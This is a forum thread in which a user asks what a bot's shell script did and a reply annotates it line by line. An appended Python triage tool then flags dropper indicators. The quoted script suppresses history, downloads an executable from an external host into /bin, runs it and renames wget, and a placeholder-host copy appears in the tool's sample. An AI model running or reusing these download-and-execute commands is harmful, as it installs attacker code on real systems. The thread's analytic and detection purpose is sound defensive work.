hax12 - 6 months ago
Bash Question

Can someone explain to me what the bot was trying to do, please?

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0
cd /bin/
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc /bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc /bin/acxxxhruvc
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
ls -la /etc/daemon.cfg
exit 0

aec
Answer

My comments are inline below.

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0

cd /bin/

#download an executable
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc

#run the downloaded executable
/bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
#it seems like it downloads an executable to overwrite the existing one
chmod + x acxxxhruvc
/bin/acxxxhruvc

sleep 2

#remove the wget application and overwrite the good application with it
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good

#list the details of this daemon.cfg file
ls -la /etc/daemon.cfg

exit 0

Basically, the good application is overwritten with wget, which I guess acts the same.

Overall, it doesn't do anything you probably want. Could be malware.
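Reading the posted script from the defender's side, the tells the answer walks through (history suppression, a download straight into /bin, chmod +x on the payload, running it, and renaming wget out of the way) are exactly what an analyst would look for when triaging a captured shell script or a shell-history dump from a compromised host. The following is an added example, not code from the thread: a small Python triage script that scans a script line by line for those indicators and reports where each one occurs. The sample scripts, the download URL and the indicator names are constructed for the example; the "good"/"acxxxhruvc" names mirror the ones in the question.

```python
"""Triage a captured shell script for dropper-style indicators.

Added example (not from the original thread). Flags the behaviours the
answer above describes: history suppression, cd into a system bin dir,
a download with an explicit output file, chmod +x, execution of the
downloaded file, and renaming of the wget/curl binaries.
"""
import re
from typing import Dict, List, Set

# (indicator name, regex) pairs; each regex is matched against one stripped line.
INDICATORS = [
    ("history_suppression", re.compile(r"^(unset\s+HIST|HISTFILE=/dev/null|HISTSIZE=0)")),
    ("cd_into_system_bin", re.compile(r"^cd\s+/(usr/(local/)?)?s?bin/?\s*$")),
    # wget -O <file> or curl -o <file>; group 2 captures the output file name.
    ("download_with_output_file", re.compile(r"^(wget|curl)\b.*\s-[oO]\s*(\S+)")),
    # Matches both "chmod +x" and the spaced "chmod + x" seen in the question.
    ("chmod_exec", re.compile(r"^chmod\s+\+\s*x\b")),
    ("rename_download_tool", re.compile(r"^mv\s+/(usr/)?bin/(wget|curl)\b")),
]


def triage(script: str) -> Dict[str, List[int]]:
    """Return {indicator: [line numbers]} for every indicator found in script."""
    findings: Dict[str, List[int]] = {}
    payloads: Set[str] = set()  # basenames of files written by a download command
    for lineno, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name, rx in INDICATORS:
            m = rx.match(line)
            if m:
                findings.setdefault(name, []).append(lineno)
                if name == "download_with_output_file":
                    payloads.add(m.group(2).rsplit("/", 1)[-1])
        # A line that starts with a path whose basename is a downloaded file
        # is the payload being run (e.g. "/bin/acxxxhruvc" or "./acxxxhruvc").
        first = line.split()[0]
        if first.startswith(("/", "./")) and first.rsplit("/", 1)[-1] in payloads:
            findings.setdefault("payload_executed", []).append(lineno)
    return findings


def verdict(findings: Dict[str, List[int]]) -> str:
    """Coarse classification from the number of distinct indicators present."""
    n = len(findings)
    if n >= 4:
        return "likely malicious dropper"
    if n >= 2:
        return "suspicious"
    return "benign-looking"


def report(script: str) -> str:
    """Human-readable triage summary for a script."""
    findings = triage(script)
    lines = [f"verdict: {verdict(findings)}"]
    for name, linenos in sorted(findings.items()):
        lines.append(f"  {name}: lines {', '.join(map(str, linenos))}")
    return "\n".join(lines)


# Constructed sample modelled on the script in the question (URL is a placeholder).
SAMPLE_SCRIPT = """\
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0
cd /bin/
wget http://dropper.example/download/m/PLACEHOLDER -O acxxxhruvc
chmod +x acxxxhruvc
/bin/acxxxhruvc
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
ls -la /etc/daemon.cfg
exit 0
"""

# Constructed benign comparison: a download into /tmp that is unpacked, not executed.
BENIGN_SCRIPT = """\
cd /tmp
curl -sL https://example.com/release.tar.gz -o release.tar.gz
tar xzf release.tar.gz
"""

if __name__ == "__main__":
    print(report(SAMPLE_SCRIPT))
    print()
    print(report(BENIGN_SCRIPT))
```

The indicators are deliberately independent so that a single one (a plain `wget -O` in an install script) does not raise the verdict on its own; it is the combination of hiding history, dropping into /bin, executing the download and then renaming wget that marks the posted script as a dropper.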